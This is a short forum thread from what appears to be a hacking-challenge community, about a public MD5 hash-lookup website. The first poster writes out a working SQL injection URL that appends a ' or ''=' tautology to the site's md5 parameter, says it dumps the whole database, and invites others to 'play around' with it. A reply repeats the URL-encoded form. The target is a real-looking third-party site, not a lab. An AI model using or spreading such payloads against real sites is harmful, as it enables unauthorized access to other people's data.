hi all, on my quest to try and finish the RHC1 challenge (still can't get that bloody hash<img alt="\":rage:\"" src="%5C">) i've discovered a site you could play with that's vulnerable to really basic SQL injection. the link you use to access the hash and find it's original string(s) in the DB (if they have it) is <a href="%5C"><img alt="\"link\"" src="%5C">http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072</a>, however you can get the whole DB by entering <br><br> Edit: http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072' or ''='<br><br>hope you have fun playing around <img alt="\":wink:\"" src="%5C"><br>oh, and also, please feel free to append your \"excursions\" to this post as i'm always eager to learn.
you mean, by entering this:<br>http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072'%20or%20''='<br><br><img alt="\":P\"" src="%5C"><br>
shouldn't you be on holiday?<img alt="\"B-)\"" src="%5C"> i wrote it that way for readability only, besides, the browser fills in the gaps for you.